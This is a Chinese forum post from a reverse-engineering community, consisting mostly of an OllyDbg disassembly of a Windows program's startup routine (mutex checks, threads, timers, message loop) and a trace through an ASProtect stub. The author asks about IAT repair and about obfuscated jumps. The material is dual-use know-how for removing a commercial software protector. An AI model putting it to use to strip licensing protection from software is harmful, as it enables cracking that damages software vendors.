0040FD1E |. 74 05 |je short 0040FD25
0040FD20 |. E8 A761FFFF |call 00405ECC
0040FD25 |> 83C3 04 |add ebx, 4
0040FD28 |. 4E |dec esi
0040FD29 |.^ 75 91 \jnz short 0040FCBC
0040FD2B |. E9 C0050000 jmp 004102F0
0040FD30 |> A1 34154100 mov eax, dword ptr ds:[411534]
0040FD35 |. BA 04010000 mov edx, 104
0040FD3A |. E8 8142FFFF call 00403FC0
0040FD3F |. 68 04010000 push 104
0040FD44 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD49 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD4B |. E8 4841FFFF call 00403E98
0040FD50 |. 50 push eax ; |PathBuffer
0040FD51 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FD56 |. 50 push eax ; |hModule => NULL
0040FD57 |. E8 C049FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FD5C |. 8BD0 mov edx, eax
0040FD5E |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD63 |. E8 5842FFFF call 00403FC0
0040FD68 |. E8 DB85FFFF call 00408348
0040FD6D |. 8D95 C0FEFFFF lea edx, dword ptr ss:[ebp-140]
0040FD73 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FD78 |. 8B00 mov eax, dword ptr ds:[eax]
0040FD7A |. E8 8166FFFF call 00406400
0040FD7F |. 8B85 C0FEFFFF mov eax, dword ptr ss:[ebp-140]
0040FD85 |. 50 push eax
0040FD86 |. 8D85 B4FEFFFF lea eax, dword ptr ss:[ebp-14C]
0040FD8C |. E8 8F7CFFFF call 00407A20
0040FD91 |. FFB5 B4FEFFFF push dword ptr ss:[ebp-14C]
0040FD97 |. A1 5C144100 mov eax, dword ptr ds:[41145C]
0040FD9C |. FF30 push dword ptr ds:[eax]
0040FD9E |. FF37 push dword ptr ds:[edi]
0040FDA0 |. 8D85 B8FEFFFF lea eax, dword ptr ss:[ebp-148]
0040FDA6 |. BA 03000000 mov edx, 3
0040FDAB |. E8 A83FFFFF call 00403D58
0040FDB0 |. 8B85 B8FEFFFF mov eax, dword ptr ss:[ebp-148]
0040FDB6 |. 8D95 BCFEFFFF lea edx, dword ptr ss:[ebp-144]
0040FDBC |. E8 3F66FFFF call 00406400
0040FDC1 |. 8B95 BCFEFFFF mov edx, dword ptr ss:[ebp-144]
0040FDC7 |. 58 pop eax
0040FDC8 |. E8 1740FFFF call 00403DE4
0040FDCD |. 0F85 7E020000 jnz 00410051
0040FDD3 |. 6A 00 push 0 ; /Title = NULL
0040FDD5 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
0040FDDA |. E8 E549FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
0040FDDF |. 85C0 test eax, eax
0040FDE1 |. 0F84 09050000 je 004102F0
0040FDE7 |. 8D95 B0FEFFFF lea edx, dword ptr ss:[ebp-150]
0040FDED |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FDF2 |. 8B00 mov eax, dword ptr ds:[eax]
0040FDF4 |. E8 A368FFFF call 0040669C
0040FDF9 |. 8D85 B0FEFFFF lea eax, dword ptr ss:[ebp-150]
0040FDFF |. 50 push eax
0040FE00 |. 8D85 A8FEFFFF lea eax, dword ptr ss:[ebp-158]
0040FE06 |. E8 BD62FFFF call 004060C8
0040FE0B |. 8B85 A8FEFFFF mov eax, dword ptr ss:[ebp-158]
0040FE11 |. 8D95 ACFEFFFF lea edx, dword ptr ss:[ebp-154]
0040FE17 |. E8 707DFFFF call 00407B8C
0040FE1C |. 8B95 ACFEFFFF mov edx, dword ptr ss:[ebp-154]
0040FE22 |. 58 pop eax
0040FE23 |. E8 783EFFFF call 00403CA0
0040FE28 |. 8B85 B0FEFFFF mov eax, dword ptr ss:[ebp-150]
0040FE2E |. E8 6540FFFF call 00403E98
0040FE33 |. 50 push eax ; /MutexName
0040FE34 |. 6A 00 push 0 ; |Inheritable = FALSE
0040FE36 |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0040FE3B |. E8 2449FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040FE40 |. 85C0 test eax, eax
0040FE42 |. 0F85 A8040000 jnz 004102F0
0040FE48 |. 8D95 A4FEFFFF lea edx, dword ptr ss:[ebp-15C]
0040FE4E |. A1 60144100 mov eax, dword ptr ds:[411460]
0040FE53 |. 8B00 mov eax, dword ptr ds:[eax]
0040FE55 |. E8 4268FFFF call 0040669C
0040FE5A |. 8D85 A4FEFFFF lea eax, dword ptr ss:[ebp-15C]
0040FE60 |. 50 push eax
0040FE61 |. 8D85 9CFEFFFF lea eax, dword ptr ss:[ebp-164]
0040FE67 |. E8 5C62FFFF call 004060C8
0040FE6C |. 8B85 9CFEFFFF mov eax, dword ptr ss:[ebp-164]
0040FE72 |. 8D95 A0FEFFFF lea edx, dword ptr ss:[ebp-160]
0040FE78 |. E8 0F7DFFFF call 00407B8C
0040FE7D |. 8B95 A0FEFFFF mov edx, dword ptr ss:[ebp-160]
0040FE83 |. 58 pop eax
0040FE84 |. E8 173EFFFF call 00403CA0
0040FE89 |. 8B85 A4FEFFFF mov eax, dword ptr ss:[ebp-15C]
0040FE8F |. E8 0440FFFF call 00403E98
0040FE94 |. 50 push eax ; /Arg3
0040FE95 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FE97 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FE99 |. E8 FE47FFFF call 0040469C ; \1.0040469C
0040FE9E |. 8B15 9C144100 mov edx, dword ptr ds:[41149C] ; 1.0041278C
0040FEA4 |. 8902 mov dword ptr ds:[edx], eax
0040FEA6 |. 8D95 98FEFFFF lea edx, dword ptr ss:[ebp-168]
0040FEAC |. A1 24154100 mov eax, dword ptr ds:[411524]
0040FEB1 |. 8B00 mov eax, dword ptr ds:[eax]
0040FEB3 |. E8 E467FFFF call 0040669C
0040FEB8 |. 8B85 98FEFFFF mov eax, dword ptr ss:[ebp-168]
0040FEBE |. E8 D53FFFFF call 00403E98
0040FEC3 |. 50 push eax ; /Arg3
0040FEC4 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0040FEC6 |. 6A 00 push 0 ; |Arg1 = 00000000
0040FEC8 |. E8 CF47FFFF call 0040469C ; \1.0040469C
0040FECD |. 8B15 AC144100 mov edx, dword ptr ds:[4114AC] ; 1.00412790
0040FED3 |. 8902 mov dword ptr ds:[edx], eax
0040FED5 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEDA |. BA 04010000 mov edx, 104
0040FEDF |. E8 DC40FFFF call 00403FC0
0040FEE4 |. 68 04010000 push 104
0040FEE9 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FEEE |. 8B00 mov eax, dword ptr ds:[eax]
0040FEF0 |. E8 A33FFFFF call 00403E98
0040FEF5 |. 50 push eax ; |PathBuffer
0040FEF6 |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040FEFB |. 50 push eax ; |hModule => NULL
0040FEFC |. E8 1B48FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040FF01 |. 8BD0 mov edx, eax
0040FF03 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040FF08 |. E8 B340FFFF call 00403FC0
0040FF0D |. E8 3684FFFF call 00408348
0040FF12 |. E8 9D6AFFFF call 004069B4
0040FF17 |. A1 70154100 mov eax, dword ptr ds:[411570]
0040FF1C |. 50 push eax ; /pThreadId => 1.004126D8
0040FF1D |. 6A 00 push 0 ; |CreationFlags = 0
0040FF1F |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF21 |. 68 C8C74000 push 0040C7C8 ; |ThreadFunction = 1.0040C7C8
0040FF26 |. 6A 00 push 0 ; |StackSize = 0
0040FF28 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF2A |. E8 8D47FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF2F |. A1 78154100 mov eax, dword ptr ds:[411578]
0040FF34 |. 50 push eax ; /pThreadId => 1.004126DC
0040FF35 |. 6A 00 push 0 ; |CreationFlags = 0
0040FF37 |. 6A 00 push 0 ; |pThreadParm = NULL
0040FF39 |. 68 4CA34000 push 0040A34C ; |ThreadFunction = 1.0040A34C
0040FF3E |. 6A 00 push 0 ; |StackSize = 0
0040FF40 |. 6A 00 push 0 ; |pSecurity = NULL
0040FF42 |. E8 7547FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF47 |. 68 3CEA4000 push 0040EA3C ; /Timerproc = 1.0040EA3C
0040FF4C |. 68 14050000 push 514 ; |Timeout = 1300. ms
0040FF51 |. 6A 00 push 0 ; |TimerID = 0
0040FF53 |. 6A 00 push 0 ; |hWnd = NULL
0040FF55 |. E8 C248FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF5A |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
0040FF60 |. 8902 mov dword ptr ds:[edx], eax
0040FF62 |. 68 F0EE4000 push 0040EEF0 ; /Timerproc = 1.0040EEF0
0040FF67 |. 68 88130000 push 1388 ; |Timeout = 5000. ms
0040FF6C |. 6A 00 push 0 ; |TimerID = 0
0040FF6E |. 6A 00 push 0 ; |hWnd = NULL
0040FF70 |. E8 A748FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF75 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0040FF7B |. 8902 mov dword ptr ds:[edx], eax
0040FF7D |. 68 08EF4000 push 0040EF08 ; /Timerproc = 1.0040EF08
0040FF82 |. 68 98080000 push 898 ; |Timeout = 2200. ms
0040FF87 |. 6A 00 push 0 ; |TimerID = 0
0040FF89 |. 6A 00 push 0 ; |hWnd = NULL
0040FF8B |. E8 8C48FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FF90 |. 8B15 C4144100 mov edx, dword ptr ds:[4114C4] ; 1.004130A4
0040FF96 |. 8902 mov dword ptr ds:[edx], eax
0040FF98 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FF9D |. 8B00 mov eax, dword ptr ds:[eax]
0040FF9F |. BA A0044100 mov edx, 004104A0 ; ASCII "no"
0040FFA4 |. E8 3B3EFFFF call 00403DE4
0040FFA9 |. 74 3B je short 0040FFE6
0040FFAB |. 68 A8C44000 push 0040C4A8
0040FFB0 |. A1 48144100 mov eax, dword ptr ds:[411448]
0040FFB5 |. 8B00 mov eax, dword ptr ds:[eax]
0040FFB7 |. E8 7864FFFF call 00406434
0040FFBC |. 50 push eax ; |Timeout
0040FFBD |. 6A 00 push 0 ; |TimerID = 0
0040FFBF |. 6A 00 push 0 ; |hWnd = NULL
0040FFC1 |. E8 5648FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0040FFC6 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0040FFCC |. 8902 mov dword ptr ds:[edx], eax
0040FFCE |. EB 16 jmp short 0040FFE6
0040FFD0 |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
0040FFD5 |. 50 |push eax ; /pMsg => WM_NULL
0040FFD6 |. E8 4948FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
0040FFDB |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0040FFE0 |. 50 |push eax ; /pMsg => WM_NULL
0040FFE1 |. E8 D647FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
0040FFE6 |> 6A 00 push 0 ; /MsgFilterMax = 0
0040FFE8 |. 6A 00 |push 0 ; |MsgFilterMin = 0
0040FFEA |. 6A 00 |push 0 ; |hWnd = NULL
0040FFEC |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0040FFF1 |. 50 |push eax ; |pMsg => 1.004126B8
0040FFF2 |. E8 E547FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
0040FFF7 |. 85C0 |test eax, eax
0040FFF9 |.^ 75 D5 \jnz short 0040FFD0
0040FFFB |. A1 74154100 mov eax, dword ptr ds:[411574]
00410000 |. 8B00 mov eax, dword ptr ds:[eax]
00410002 |. 50 push eax ; /TimerID
00410003 |. 6A 00 push 0 ; |hWnd = NULL
00410005 |. E8 FA47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
0041000A |. A1 84154100 mov eax, dword ptr ds:[411584]
0041000F |. 8B00 mov eax, dword ptr ds:[eax]
00410011 |. 50 push eax ; /TimerID
00410012 |. 6A 00 push 0 ; |hWnd = NULL
00410014 |. E8 EB47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410019 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
0041001E |. 8B00 mov eax, dword ptr ds:[eax]
00410020 |. 50 push eax ; /TimerID
00410021 |. 6A 00 push 0 ; |hWnd = NULL
00410023 |. E8 DC47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410028 |. A1 C4144100 mov eax, dword ptr ds:[4114C4]
0041002D |. 8B00 mov eax, dword ptr ds:[eax]
0041002F |. 50 push eax ; /TimerID
00410030 |. 6A 00 push 0 ; |hWnd = NULL
00410032 |. E8 CD47FFFF call <jmp.&user32.KillTimer> ; \KillTimer
00410037 |. A1 9C144100 mov eax, dword ptr ds:[41149C]
0041003C |. 8B00 mov eax, dword ptr ds:[eax]
0041003E |. 50 push eax ; /hMutex
0041003F |. E8 3047FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410044 |. A1 AC144100 mov eax, dword ptr ds:[4114AC]
00410049 |. 8B00 mov eax, dword ptr ds:[eax]
0041004B |. 50 push eax ; /hMutex
0041004C |. E8 2347FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
00410051 |> 8D95 94FEFFFF lea edx, dword ptr ss:[ebp-16C]
00410057 |. A1 34154100 mov eax, dword ptr ds:[411534]
0041005C |. 8B00 mov eax, dword ptr ds:[eax]
0041005E |. E8 9D63FFFF call 00406400
00410063 |. 8B85 94FEFFFF mov eax, dword ptr ss:[ebp-16C]
00410069 |. 50 push eax
0041006A |. 8D85 88FEFFFF lea eax, dword ptr ss:[ebp-178]
00410070 |. E8 5B7AFFFF call 00407AD0
00410075 |. FFB5 88FEFFFF push dword ptr ss:[ebp-178]
0041007B |. A1 3C154100 mov eax, dword ptr ds:[41153C]
00410080 |. FF30 push dword ptr ds:[eax]
00410082 |. FF37 push dword ptr ds:[edi]
00410084 |. 8D85 8CFEFFFF lea eax, dword ptr ss:[ebp-174]
0041008A |. BA 03000000 mov edx, 3
0041008F |. E8 C43CFFFF call 00403D58
00410094 |. 8B85 8CFEFFFF mov eax, dword ptr ss:[ebp-174]
0041009A |. 8D95 90FEFFFF lea edx, dword ptr ss:[ebp-170]
004100A0 |. E8 5B63FFFF call 00406400
004100A5 |. 8B95 90FEFFFF mov edx, dword ptr ss:[ebp-170]
004100AB |. 58 pop eax
004100AC |. E8 333DFFFF call 00403DE4
004100B1 |. 0F85 39020000 jnz 004102F0
004100B7 |. 6A 00 push 0 ; /Title = NULL
004100B9 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
004100BE |. E8 0147FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
004100C3 |. 85C0 test eax, eax
004100C5 |. 0F84 25020000 je 004102F0
004100CB |. 8D85 80FEFFFF lea eax, dword ptr ss:[ebp-180]
004100D1 |. E8 F25FFFFF call 004060C8
004100D6 |. 8B85 80FEFFFF mov eax, dword ptr ss:[ebp-180]
004100DC |. 8D95 84FEFFFF lea edx, dword ptr ss:[ebp-17C]
004100E2 |. E8 A57AFFFF call 00407B8C
004100E7 |. 8D85 84FEFFFF lea eax, dword ptr ss:[ebp-17C]
004100ED |. 50 push eax
004100EE |. 8D95 7CFEFFFF lea edx, dword ptr ss:[ebp-184]
004100F4 |. A1 64144100 mov eax, dword ptr ds:[411464]
004100F9 |. 8B00 mov eax, dword ptr ds:[eax]
004100FB |. E8 9C65FFFF call 0040669C
00410100 |. 8B95 7CFEFFFF mov edx, dword ptr ss:[ebp-184]
00410106 |. 58 pop eax
00410107 |. E8 943BFFFF call 00403CA0
0041010C |. 8B85 84FEFFFF mov eax, dword ptr ss:[ebp-17C]
00410112 |. E8 813DFFFF call 00403E98
00410117 |. 50 push eax ; /MutexName
00410118 |. 6A 00 push 0 ; |Inheritable = FALSE
0041011A |. 68 01001F00 push 1F0001 ; |Access = 1F0001
0041011F |. E8 4046FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
00410124 |. 85C0 test eax, eax
00410126 |. 0F85 C4010000 jnz 004102F0
0041012C |. 8D85 74FEFFFF lea eax, dword ptr ss:[ebp-18C]
00410132 |. E8 915FFFFF call 004060C8
00410137 |. 8B85 74FEFFFF mov eax, dword ptr ss:[ebp-18C]
0041013D |. 8D95 78FEFFFF lea edx, dword ptr ss:[ebp-188]
00410143 |. E8 447AFFFF call 00407B8C
00410148 |. 8D85 78FEFFFF lea eax, dword ptr ss:[ebp-188]
0041014E |. 50 push eax
0041014F |. 8D95 70FEFFFF lea edx, dword ptr ss:[ebp-190]
00410155 |. A1 64144100 mov eax, dword ptr ds:[411464]
0041015A |. 8B00 mov eax, dword ptr ds:[eax]
0041015C |. E8 3B65FFFF call 0040669C
00410161 |. 8B95 70FEFFFF mov edx, dword ptr ss:[ebp-190]
00410167 |. 58 pop eax
00410168 |. E8 333BFFFF call 00403CA0
0041016D |. 8B85 78FEFFFF mov eax, dword ptr ss:[ebp-188]
00410173 |. E8 203DFFFF call 00403E98
00410178 |. 50 push eax ; /Arg3
00410179 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
0041017B |. 6A 00 push 0 ; |Arg1 = 00000000
0041017D |. E8 1A45FFFF call 0040469C ; \1.0040469C
00410182 |. 8B15 88154100 mov edx, dword ptr ds:[411588] ; 1.00412794
00410188 |. 8902 mov dword ptr ds:[edx], eax
0041018A |. 8D95 6CFEFFFF lea edx, dword ptr ss:[ebp-194]
00410190 |. A1 40154100 mov eax, dword ptr ds:[411540]
00410195 |. 8B00 mov eax, dword ptr ds:[eax]
00410197 |. E8 0065FFFF call 0040669C
0041019C |. 8B85 6CFEFFFF mov eax, dword ptr ss:[ebp-194]
004101A2 |. E8 F13CFFFF call 00403E98
004101A7 |. 50 push eax ; /Arg3
004101A8 |. 6A FF push -1 ; |Arg2 = FFFFFFFF
004101AA |. 6A 00 push 0 ; |Arg1 = 00000000
004101AC |. E8 EB44FFFF call 0040469C ; \1.0040469C
004101B1 |. 8B15 20154100 mov edx, dword ptr ds:[411520] ; 1.00412798
004101B7 |. 8902 mov dword ptr ds:[edx], eax
004101B9 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101BE |. BA 04010000 mov edx, 104
004101C3 |. E8 F83DFFFF call 00403FC0
004101C8 |. 68 04010000 push 104
004101CD |. A1 34154100 mov eax, dword ptr ds:[411534]
004101D2 |. 8B00 mov eax, dword ptr ds:[eax]
004101D4 |. E8 BF3CFFFF call 00403E98
004101D9 |. 50 push eax ; |PathBuffer
004101DA |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
004101DF |. 50 push eax ; |hModule => NULL
004101E0 |. E8 3745FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
004101E5 |. 8BD0 mov edx, eax
004101E7 |. A1 34154100 mov eax, dword ptr ds:[411534]
004101EC |. E8 CF3DFFFF call 00403FC0
004101F1 |. E8 5281FFFF call 00408348
004101F6 |. E8 B967FFFF call 004069B4
004101FB |. A1 70154100 mov eax, dword ptr ds:[411570]
00410200 |. 50 push eax ; /pThreadId => 1.004126D8
00410201 |. 6A 00 push 0 ; |CreationFlags = 0
00410203 |. 6A 00 push 0 ; |pThreadParm = NULL
00410205 |. 68 E0E64000 push 0040E6E0 ; |ThreadFunction = 1.0040E6E0
0041020A |. 6A 00 push 0 ; |StackSize = 0
0041020C |. 6A 00 push 0 ; |pSecurity = NULL
0041020E |. E8 A944FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
00410213 |. A1 78154100 mov eax, dword ptr ds:[411578]
00410218 |. 50 push eax ; /pThreadId => 1.004126DC
00410219 |. 6A 00 push 0 ; |CreationFlags = 0
0041021B |. 6A 00 push 0 ; |pThreadParm = NULL
0041021D |. 68 D8BD4000 push 0040BDD8 ; |ThreadFunction = 1.0040BDD8
00410222 |. 6A 00 push 0 ; |StackSize = 0
00410224 |. 6A 00 push 0 ; |pSecurity = NULL
00410226 |. E8 9144FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0041022B |. 68 A0EC4000 push 0040ECA0 ; /Timerproc = 1.0040ECA0
00410230 |. 68 14050000 push 514 ; |Timeout = 1300. ms
00410235 |. 6A 00 push 0 ; |TimerID = 0
00410237 |. 6A 00 push 0 ; |hWnd = NULL
00410239 |. E8 DE45FFFF call <jmp.&user32.SetTimer> ; \SetTimer
0041023E |. 8B15 74154100 mov edx, dword ptr ds:[411574] ; 1.00413098
00410244 |. 8902 mov dword ptr ds:[edx], eax
00410246 |. 68 E4EE4000 push 0040EEE4 ; /Timerproc = 1.0040EEE4
0041024B |. 68 70170000 push 1770 ; |Timeout = 6000. ms
00410250 |. 6A 00 push 0 ; |TimerID = 0
00410252 |. 6A 00 push 0 ; |hWnd = NULL
00410254 |. E8 C345FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410259 |. 8B15 84154100 mov edx, dword ptr ds:[411584] ; 1.0041309C
0041025F |. 8902 mov dword ptr ds:[edx], eax
00410261 |. 68 0CF24000 push 0040F20C ; /Timerproc = 1.0040F20C
00410266 |. 68 E8030000 push 3E8 ; |Timeout = 1000. ms
0041026B |. 6A 00 push 0 ; |TimerID = 0
0041026D |. 6A 00 push 0 ; |hWnd = NULL
0041026F |. E8 A845FFFF call <jmp.&user32.SetTimer> ; \SetTimer
00410274 |. 8B15 F8144100 mov edx, dword ptr ds:[4114F8] ; 1.004130A0
0041027A |. 8902 mov dword ptr ds:[edx], eax
0041027C |. EB 16 jmp short 00410294
0041027E |> A1 6C154100 /mov eax, dword ptr ds:[41156C]
00410283 |. 50 |push eax ; /pMsg => WM_NULL
00410284 |. E8 9B45FFFF |call <jmp.&user32.TranslateMessage> ; \TranslateMessage
00410289 |. A1 6C154100 |mov eax, dword ptr ds:[41156C]
0041028E |. 50 |push eax ; /pMsg => WM_NULL
0041028F |. E8 2845FFFF |call <jmp.&user32.DispatchMessageA> ; \DispatchMessageA
00410294 |> 6A 00 push 0 ; /MsgFilterMax = 0
00410296 |. 6A 00 |push 0 ; |MsgFilterMin = 0
00410298 |. 6A 00 |push 0 ; |hWnd = NULL
0041029A |. A1 6C154100 |mov eax, dword ptr ds:[41156C] ; |
0041029F |. 50 |push eax ; |pMsg => 1.004126B8
004102A0 |. E8 3745FFFF |call <jmp.&user32.GetMessageA> ; \GetMessageA
004102A5 |. 85C0 |test eax, eax
004102A7 |.^ 75 D5 \jnz short 0041027E
004102A9 |. A1 74154100 mov eax, dword ptr ds:[411574]
004102AE |. 8B00 mov eax, dword ptr ds:[eax]
004102B0 |. 50 push eax ; /TimerID
004102B1 |. 6A 00 push 0 ; |hWnd = NULL
004102B3 |. E8 4C45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102B8 |. A1 84154100 mov eax, dword ptr ds:[411584]
004102BD |. 8B00 mov eax, dword ptr ds:[eax]
004102BF |. 50 push eax ; /TimerID
004102C0 |. 6A 00 push 0 ; |hWnd = NULL
004102C2 |. E8 3D45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102C7 |. A1 F8144100 mov eax, dword ptr ds:[4114F8]
004102CC |. 8B00 mov eax, dword ptr ds:[eax]
004102CE |. 50 push eax ; /TimerID
004102CF |. 6A 00 push 0 ; |hWnd = NULL
004102D1 |. E8 2E45FFFF call <jmp.&user32.KillTimer> ; \KillTimer
004102D6 |. A1 88154100 mov eax, dword ptr ds:[411588]
004102DB |. 8B00 mov eax, dword ptr ds:[eax]
004102DD |. 50 push eax ; /hMutex
004102DE |. E8 9144FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102E3 |. A1 20154100 mov eax, dword ptr ds:[411520]
004102E8 |. 8B00 mov eax, dword ptr ds:[eax]
004102EA |. 50 push eax ; /hMutex
004102EB |. E8 8444FFFF call <jmp.&kernel32.ReleaseMutex> ; \ReleaseMutex
004102F0 |> 33C0 xor eax, eax
004102F2 |. 5A pop edx
004102F3 |. 59 pop ecx
004102F4 |. 59 pop ecx
004102F5 |. 64:8910 mov dword ptr fs:[eax], edx
004102F8 |. 68 25034100 push 00410325
004102FD |> 8D85 6CFEFFFF lea eax, dword ptr ss:[ebp-194]
00410303 |. BA 39000000 mov edx, 39
00410308 |. E8 2B38FFFF call 00403B38
0041030D |. 8D85 78FFFFFF lea eax, dword ptr ss:[ebp-88]
00410313 |. BA 1E000000 mov edx, 1E
00410318 |. E8 1B38FFFF call 00403B38
0041031D \. C3 retn
这么啰嗦希望大侠们不要嫌麻烦。
在这里有几个问题想请教路过的大侠们,
1、aspr脱壳后是要修复的,手动的,用脚本的,可这个好像并不用,是不是因为里面还有一层壳已经把iat加密了。
2、在aspr中总是有一些代码跳到一个在od中看不到的指令去,可一跳过去就指令就出现了,
但只要滚动一下窗口,马上就又变了,这是为什么?
以上是看别人精华,边跟踪时遇到的问题,不知是不是问的很低级,本人水平太菜。
让大侠们见笑了。
现在已经夜里两点了,等等再慢慢分析它的工作流程啦,先歇了。
也耽搁看小菜贴子的大侠的宝贵时间了。
谢谢lovelyfrog、sskey、夜凉如水的热心帮助,
因为自己没上网,只能抽机会上网贴一些事先写好的东西,
所以一般就不能回帖感谢诸位了,
连上这次一块谢谢大侠们了,还有看雪这个宝地。
再次感谢诸位了,
接上回
00D8ED08 68 1F8724DD push DD24871F ;靠插件断在这里,只隐藏了一个peb
00D8ED0D 68 2C2A0000 push 2A2C
00D8ED12 68 900A0200 push 20A90
00D8ED17 68 C0200000 push 20C0
00D8ED1C 68 44CC0000 push 0CC44
00D8ED21 68 00F00400 push 4F000
00D8ED26 FF35 D434DC00 push dword ptr ds:[DC34D4]
00D8ED2C E8 23D1FFFF call 00D8BE54
00D8ED31 310424 xor dword ptr ss:[esp], eax
00D8ED34 8B05 D434DC00 mov eax, dword ptr ds:[DC34D4]
00D8ED3A 010424 add dword ptr ss:[esp], eax
00D8ED3D C3 retn ;返回
00D8ED3E C3 retn
00DC01D8 68 E1288508 push 88528E1 ;到这里
00DC01DD 68 E0020000 push 2E0
00DC01E2 68 04590100 push 15904
00DC01E7 68 C4170000 push 17C4
00DC01EC 68 10EA0300 push 3EA10
00DC01F1 68 00F00400 push 4F000
00DC01F6 FF35 D434DC00 push dword ptr ds:[DC34D4]
00DC01FC E8 01000000 call 00DC0202
00DC0201 8183 C404E84A B>add dword ptr ds:[ebx+4AE804C4], E8F>
00DC020B 0100 add dword ptr ds:[eax], eax
00DC020D 0000 add byte ptr ds:[eax], al
00DC020F 8183 C4043104 2>add dword ptr ds:[ebx+43104C4], 1E82>
00DC0219 0000 add byte ptr ds:[eax], al
00DC021B 68 83C4048B push 8B04C483
00DC0220 05 D434DC00 add eax, 0DC34D4
00DC0225 E8 02000000 call 00DC022C
00DC022A E8 6883C404 call 05A08597
00DC022F 010424 add dword ptr ss:[esp], eax
00DC0232 C3 retn ;f4, f8
00DBFADC E8 E7FEFFFF call 00DBF9C8 ;进
00DBF9C8 53 push ebx ;到这里
00DBF9C9 56 push esi
00DBF9CA 57 push edi
00DBF9CB 83C4 DC add esp, -24
00DBF9CE A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBF9D3 C600 DF mov byte ptr ds:[eax], 0DF
00DBF9D6 A1 50B6DC00 mov eax, dword ptr ds:[DCB650]
00DBF9DB 894424 14 mov dword ptr ss:[esp+14], eax
00DBF9DF B8 34E8DB00 mov eax, 0DBE834
00DBF9E4 894424 18 mov dword ptr ss:[esp+18], eax
00DBF9E8 BA C8F9DB00 mov edx, 0DBF9C8
00DBF9ED 2BD0 sub edx, eax
00DBF9EF 895424 1C mov dword ptr ss:[esp+1C], edx
00DBF9F3 B8 40E6DB00 mov eax, 0DBE640
00DBF9F8 8B15 F02BDC00 mov edx, dword ptr ds:[DC2BF0]
00DBF9FE 8B12 mov edx, dword ptr ds:[edx]
00DBFA00 2B02 sub eax, dword ptr ds:[edx]
00DBFA02 894424 20 mov dword ptr ss:[esp+20], eax
00DBFA06 EB 06 jmp short 00DBFA0E
00DBFA08 FF25 C3EB01E8 jmp near dword ptr ds:[E801EBC3]
00DBFA0E 68 A7E8DB00 push 0DBE8A7
00DBFA13 58 pop eax
00DBFA14 40 inc eax
00DBFA15 68 1DFADB00 push 0DBFA1D
00DBFA1A 50 push eax
00DBFA1B ^ EB ED jmp short 00DBFA0A
00DBFA1D E8 1EF4FFFF call 00DBEE40
00DBFA22 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA27 8B00 mov eax, dword ptr ds:[eax]
00DBFA29 8B70 1C mov esi, dword ptr ds:[eax+1C]
00DBFA2C A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA31 8B00 mov eax, dword ptr ds:[eax]
00DBFA33 8B38 mov edi, dword ptr ds:[eax]
00DBFA35 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA3A 8B00 mov eax, dword ptr ds:[eax]
00DBFA3C 8D58 18 lea ebx, dword ptr ds:[eax+18]
00DBFA3F 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA42 75 20 jnz short 00DBFA64
00DBFA44 83C6 20 add esi, 20
00DBFA47 A1 682ADC00 mov eax, dword ptr ds:[DC2A68]
00DBFA4C 80B8 2D010000 0>cmp byte ptr ds:[eax+12D], 0
00DBFA53 75 0F jnz short 00DBFA64
